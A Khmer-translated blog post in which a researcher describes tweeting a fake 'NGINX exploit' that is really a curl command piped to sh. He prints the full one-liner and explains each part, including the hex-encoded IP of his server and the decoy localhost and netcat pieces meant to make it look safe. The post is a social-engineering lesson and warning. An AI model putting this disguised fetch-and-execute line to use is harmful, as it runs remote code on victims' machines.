ជោគជ័យនៃការពិសោធន៍សង្គមជាមួយនឹងការកេងប្រវ័ញ្ច nginx ក្លែងក្លាយ

ចំណាំ។ បកប្រែ: អ្នកនិពន្ធ កំណត់ចំណាំដើមដែលបានបោះពុម្ពនៅថ្ងៃទី 1 ខែមិថុនាបានសម្រេចចិត្តធ្វើការពិសោធន៍ក្នុងចំណោមអ្នកដែលចាប់អារម្មណ៍លើសុវត្ថិភាពព័ត៌មាន។ ដើម្បីធ្វើដូច្នេះគាត់បានរៀបចំការកេងប្រវ័ញ្ចក្លែងក្លាយសម្រាប់ភាពងាយរងគ្រោះដែលមិនត្រូវបានបង្ហាញនៅក្នុងម៉ាស៊ីនមេគេហទំព័រ ហើយបង្ហោះវានៅលើ Twitter របស់គាត់។ ការសន្មត់របស់គាត់ - ត្រូវបានលាតត្រដាងភ្លាមៗដោយអ្នកឯកទេសដែលនឹងឃើញការបោកបញ្ឆោតជាក់ស្តែងនៅក្នុងកូដ - មិនត្រឹមតែមិនក្លាយជាការពិតទេ ... ពួកគេលើសពីការរំពឹងទុកទាំងអស់ហើយក្នុងទិសដៅផ្ទុយគ្នា: tweet ទទួលបានការគាំទ្រយ៉ាងខ្លាំងពីមនុស្សជាច្រើនដែលមិន ពិនិត្យមាតិការបស់វា។

TL;DR៖ កុំប្រើបំពង់បង្ហូរឯកសារជា sh ឬ bash ក្នុងកាលៈទេសៈណាក៏ដោយ។ នេះគឺជាវិធីដ៏ល្អមួយដើម្បីបាត់បង់ការគ្រប់គ្រងកុំព្យូទ័ររបស់អ្នក។

ខ្ញុំចង់ចែករំលែកជាមួយអ្នកនូវរឿងខ្លីមួយអំពីការកេងប្រវ័ញ្ច PoC បែបកំប្លែងដែលត្រូវបានបង្កើតឡើងនៅថ្ងៃទី 31 ខែឧសភា។ គាត់បានបង្ហាញខ្លួនភ្លាមៗ ដើម្បីឆ្លើយតបនឹងព័ត៌មានពី Alisa Esage Shevchenko, សមាជិក គំនិតផ្តួចផ្តើមថ្ងៃសូន្យ (ZDI) ព័ត៌មាននោះអំពីភាពងាយរងគ្រោះនៅក្នុង NGINX ដែលនាំទៅដល់ RCE (ការប្រតិបត្តិលេខកូដពីចម្ងាយ) នឹងត្រូវបានបង្ហាញក្នុងពេលឆាប់ៗនេះ។ ចាប់តាំងពី NGINX ផ្តល់ថាមពលដល់គេហទំព័រជាច្រើន ព័ត៌មានត្រូវតែជាគ្រាប់បែក។ ប៉ុន្តែដោយសារតែការពន្យាពេលនៅក្នុងដំណើរការ "ការបង្ហាញដោយការទទួលខុសត្រូវ" ព័ត៌មានលម្អិតនៃអ្វីដែលបានកើតឡើងមិនត្រូវបានគេដឹងនោះទេ - នេះគឺជានីតិវិធីស្តង់ដារ ZDI ។

ធ្វីត អំពីការបង្ហាញភាពងាយរងគ្រោះនៅក្នុង NGINX

ដោយបានបញ្ចប់ការធ្វើការលើបច្ចេកទេស obfuscation ថ្មីនៅក្នុង curl ខ្ញុំបានដកស្រង់ Tweet ដើម ហើយ "លេចធ្លាយ PoC ដែលកំពុងដំណើរការ" ដែលមានបន្ទាត់តែមួយនៃកូដដែលសន្មត់ថាទាញយកភាពងាយរងគ្រោះដែលបានរកឃើញ។ ជាការពិតណាស់ នេះគឺជាការមិនសមហេតុសមផលពេញលេញ។ ខ្ញុំសន្មត់ថាខ្ញុំនឹងត្រូវលាតត្រដាងភ្លាមៗ ហើយល្អបំផុត ខ្ញុំនឹងទទួលបានសារឡើងវិញពីរបីដង (អូ៎)។

ធ្វីត ជាមួយនឹងការកេងប្រវ័ញ្ចក្លែងក្លាយ

ទោះ​ជា​យ៉ាង​ណា ខ្ញុំ​មិន​អាច​ស្រមៃ​ឃើញ​ថា​មាន​អ្វី​កើត​ឡើង​បន្ទាប់​ទៀត។ ប្រជាប្រិយភាពរបស់ tweet របស់ខ្ញុំបានកើនឡើងយ៉ាងខ្លាំង។ គួរឱ្យភ្ញាក់ផ្អើលនៅពេលនេះ (15:00 ម៉ោងនៅទីក្រុងមូស្គូថ្ងៃទី 1 ខែមិថុនា) មានមនុស្សតិចណាស់ដែលបានដឹងថានេះគឺជាក្លែងក្លាយ។ មនុស្សជាច្រើនបានបង្ហោះវាឡើងវិញដោយមិនពិនិត្យមើលវាទាល់តែសោះ (អនុញ្ញាតឱ្យមានការកោតសរសើរចំពោះក្រាហ្វិក ASCII ដ៏គួរឱ្យស្រឡាញ់ដែលវាចេញ) ។

មើល​ទៅ​ស្អាត​ប៉ុណ្ណា!

ខណៈពេលដែលរង្វិលជុំ និងពណ៌ទាំងអស់នេះគឺអស្ចារ្យ វាច្បាស់ណាស់ថាមនុស្សត្រូវតែដំណើរការកូដនៅលើម៉ាស៊ីនរបស់ពួកគេដើម្បីមើលពួកគេ។ ជាសំណាងល្អ កម្មវិធីរុករកតាមអ៊ីនធឺណិតដំណើរការដូចគ្នា ហើយរួមជាមួយនឹងការពិតដែលថាខ្ញុំពិតជាមិនចង់មានបញ្ហាផ្លូវច្បាប់ លេខកូដដែលកប់នៅក្នុងគេហទំព័ររបស់ខ្ញុំគឺគ្រាន់តែធ្វើការហៅតាមអេកូដោយមិនព្យាយាមដំឡើង ឬប្រតិបត្តិកូដបន្ថែមណាមួយឡើយ។

ការបំភាន់តូចមួយ៖ ងឿងឆ្ងល់, dnzខ្ញុំ និងបុរសផ្សេងទៀតមកពីក្រុម ហ្វូងមនុស្ស យើង​បាន​លេង​ជាមួយ​វិធី​ផ្សេង​គ្នា​ក្នុង​ការ​ធ្វើ​ឱ្យ​ច្រឡំ​ពាក្យ​បញ្ជា curl មួយ​រយៈ​មក​ហើយ​ព្រោះ​វា​ឡូយ... ហើយ​យើង​ជា​មនុស្ស​ពូកែ។ netspooky និង dnz បានរកឃើញវិធីសាស្រ្តថ្មីជាច្រើនដែលហាក់ដូចជាមានសំណាងខ្លាំងសម្រាប់ខ្ញុំ។ ខ្ញុំបានចូលរួមក្នុងភាពសប្បាយរីករាយ ហើយបានព្យាយាមបន្ថែមការបំប្លែងទសភាគ IP ទៅក្នុងកាបូបនៃល្បិច។ វាប្រែថា IP ក៏អាចត្រូវបានបម្លែងទៅជាទម្រង់គោលដប់ប្រាំមួយ។ លើសពីនេះទៅទៀត curl និងឧបករណ៍ NIX ផ្សេងទៀតភាគច្រើនរីករាយនឹងទទួលទាន IPs លេខគោលដប់ប្រាំមួយ! ដូច្នេះវាគ្រាន់តែជាបញ្ហានៃការបង្កើតបន្ទាត់ពាក្យបញ្ជាដែលគួរឱ្យជឿជាក់ និងមានសុវត្ថិភាពប៉ុណ្ណោះ។ ទីបំផុតខ្ញុំបានសម្រេចចិត្តលើរឿងនេះ៖

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

វិស្វកម្មអេឡិចត្រូនិចសង្គម (SEE) - ច្រើនជាងការបន្លំ

សុវត្ថិភាព និងការយល់ដឹងគឺជាផ្នែកសំខាន់នៃការពិសោធន៍នេះ។ ខ្ញុំគិតថាពួកគេជាអ្វីដែលនាំឱ្យគាត់ទទួលបានជោគជ័យ។ បន្ទាត់ពាក្យបញ្ជាបញ្ជាក់យ៉ាងច្បាស់អំពីសុវត្ថិភាពដោយយោងទៅ "127.0.0.1" (ម៉ាស៊ីនមូលដ្ឋានល្បី) ។ Localhost ត្រូវបានចាត់ទុកថាមានសុវត្ថិភាព ហើយទិន្នន័យនៅលើវាមិនដែលចេញពីកុំព្យូទ័ររបស់អ្នកទេ។

ភាពធ្លាប់ស្គាល់គឺជាសមាសធាតុ SEE សំខាន់ទីពីរនៃការពិសោធន៍។ ដោយសារទស្សនិកជនគោលដៅជាចម្បងមានមនុស្សដែលស្គាល់ពីមូលដ្ឋានគ្រឹះនៃសុវត្ថិភាពកុំព្យូទ័រ វាជាការសំខាន់ក្នុងការបង្កើតកូដដើម្បីឱ្យផ្នែកខ្លះរបស់វាហាក់ដូចជាធ្លាប់ស្គាល់ និងធ្លាប់ស្គាល់ (ហើយដូច្នេះមានសុវត្ថិភាព)។ ការខ្ចីធាតុនៃគោលគំនិតកេងប្រវ័ញ្ចចាស់ ហើយបញ្ចូលវាតាមរបៀបមិនធម្មតា បង្ហាញថាទទួលបានជោគជ័យខ្លាំង។

ខាង​ក្រោម​នេះ​គឺ​ជា​ការ​វិភាគ​លម្អិត​នៃ​មួយ​បន្ទាត់​។ អ្វីគ្រប់យ៉ាងនៅក្នុងបញ្ជីនេះពាក់ ធម្មជាតិគ្រឿងសំអាងហើយជាក់ស្តែង គ្មានអ្វីត្រូវបានទាមទារសម្រាប់ប្រតិបត្តិការជាក់ស្តែងរបស់វានោះទេ។

តើសមាសធាតុអ្វីខ្លះដែលចាំបាច់? នេះ។ -gsS, -O 0x0238f06a, |sh និងម៉ាស៊ីនមេបណ្តាញខ្លួនឯង។ ម៉ាស៊ីនមេគេហទំព័រមិនមានការណែនាំព្យាបាទទេ ប៉ុន្តែគ្រាន់តែបម្រើក្រាហ្វិក ASCII ដោយប្រើពាក្យបញ្ជា echo នៅក្នុងស្គ្រីបដែលមាននៅក្នុង index.html. នៅពេលដែលអ្នកប្រើប្រាស់បានបញ្ចូលបន្ទាត់ជាមួយ |sh នៅ​ពាក់កណ្ដាល, index.html ផ្ទុកនិងប្រតិបត្តិ។ ជាសំណាងល្អ អ្នកថែរក្សាម៉ាស៊ីនមេគេហទំព័រមិនមានចេតនាអាក្រក់ទេ។

• ../../../%00 - តំណាងឱ្យហួសពីថត;
• ngx_stream_module.so - ផ្លូវទៅកាន់ម៉ូឌុល NGINX ចៃដន្យ;
• /bin/sh%00<'protocol:TCP' - យើងសន្មត់ថាចាប់ផ្តើម /bin/sh នៅលើម៉ាស៊ីនគោលដៅនិងបញ្ជូនបន្តទិន្នផលទៅឆានែល TCP;
• -O 0x0238f06a#PLToffset - គ្រឿងផ្សំសម្ងាត់, បន្ថែម #PLToffsetដើម្បីមើលទៅដូចជាអុហ្វសិតអង្គចងចាំដែលមាននៅក្នុង PLT ។
• |sh; - បំណែកសំខាន់មួយទៀត។ យើងត្រូវប្តូរទិសលទ្ធផលទៅ sh/bash ដើម្បីប្រតិបត្តិកូដដែលចេញមកពីម៉ាស៊ីនមេគេហទំព័រវាយប្រហារដែលមានទីតាំងនៅ 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - អត់ចេះសោះដែល netcat សំដៅលើ /dev/tcp/localhostដើម្បីឱ្យអ្វីៗមើលទៅមានសុវត្ថិភាពម្តងទៀត។ តាមការពិតវាមិនធ្វើអ្វីសោះហើយត្រូវបានបញ្ចូលក្នុងបន្ទាត់សម្រាប់ភាពស្រស់ស្អាត។

នេះបញ្ចប់ការឌិកូដនៃអក្សរមួយបន្ទាត់ និងការពិភាក្សាអំពីទិដ្ឋភាពនៃ "វិស្វកម្មអេឡិចត្រូនិចសង្គម" (ការបន្លំស្មុគ្រស្មាញ)។

ការកំណត់រចនាសម្ព័ន្ធម៉ាស៊ីនមេគេហទំព័រ និងវិធានការប្រឆាំង

ដោយសារតែភាគច្រើននៃអតិថិជនរបស់ខ្ញុំគឺជា infosec/hackers ខ្ញុំបានសម្រេចចិត្តធ្វើឱ្យម៉ាស៊ីនមេគេហទំព័រមានភាពធន់នឹងការបញ្ចេញមតិ "ចំណាប់អារម្មណ៍" នៅលើផ្នែករបស់ពួកគេ ដើម្បីអោយបុរសៗមានអ្វីដែលត្រូវធ្វើ (ហើយវានឹងរីករាយក្នុងការ រៀបចំ) ។ ខ្ញុំនឹងមិនរាយបញ្ជីបញ្ហាទាំងអស់នៅទីនេះទេ ចាប់តាំងពីការពិសោធន៍កំពុងបន្ត ប៉ុន្តែនេះគឺជារឿងមួយចំនួនដែលម៉ាស៊ីនមេធ្វើ៖

• តាមដានយ៉ាងសកម្មនូវការប៉ុនប៉ងចែកចាយនៅលើបណ្តាញសង្គមជាក់លាក់ និងជំនួសរូបភាពតូចមើលជាមុនផ្សេងៗ ដើម្បីលើកទឹកចិត្តអ្នកប្រើប្រាស់ឱ្យចុចលើតំណ។
• បញ្ជូនបន្ត Chrome/Mozilla/Safari/etc ទៅវីដេអូផ្សព្វផ្សាយ Thugcrowd ជំនួសឱ្យការបង្ហាញស្គ្រីបសែល។
• ឃ្លាំមើលសញ្ញាច្បាស់លាស់នៃការឈ្លានពាន/ការលួចចូលដោយឥតលាក់លៀម ហើយបន្ទាប់មកចាប់ផ្តើមបញ្ជូនសំណើទៅកាន់ម៉ាស៊ីនមេ NSA (ha!)។
• ដំឡើង Trojan ក៏ដូចជា BIOS rootkit នៅលើកុំព្យូទ័រទាំងអស់ដែលអ្នកប្រើប្រាស់ចូលមើលម៉ាស៊ីនពីកម្មវិធីរុករកធម្មតា (គ្រាន់តែនិយាយលេងទេ!)

ផ្នែកតូចមួយនៃ antimers

ក្នុងករណីនេះ គោលដៅតែមួយគត់របស់ខ្ញុំគឺដើម្បីធ្វើជាម្ចាស់នៃលក្ខណៈពិសេសមួយចំនួនរបស់ Apache ជាពិសេស ច្បាប់ល្អសម្រាប់ការប្តូរទិសសំណើ - ហើយខ្ញុំបានគិតថា៖ ហេតុអ្វីមិនធ្វើ?

NGINX Exploit (ពិត!)

ជា​វ​ជា​ប្រចាំ​ទៅ​កាន់ @alisaesage នៅលើ Twitter ហើយធ្វើតាមការងារដ៏អស្ចារ្យរបស់ ZDI ក្នុងការដោះស្រាយភាពងាយរងគ្រោះពិតប្រាកដ និងឱកាសកេងប្រវ័ញ្ចនៅក្នុង NGINX ។ ការងាររបស់ពួកគេតែងតែធ្វើឱ្យខ្ញុំចាប់អារម្មណ៍ ហើយខ្ញុំដឹងគុណចំពោះ Alice ចំពោះការអត់ធ្មត់របស់នាងជាមួយនឹងការលើកឡើង និងការជូនដំណឹងទាំងអស់ដែលធ្វីតធ្វីតល្ងង់របស់ខ្ញុំបានបង្កឡើង។ ជាសំណាងល្អ វាក៏ធ្វើបានល្អខ្លះដែរ៖ វាជួយបង្កើនការយល់ដឹងអំពីភាពងាយរងគ្រោះ NGINX ក៏ដូចជាបញ្ហាដែលបណ្តាលមកពីការរំលោភបំពាននៃ curl ។

ប្រភព: www.habr.com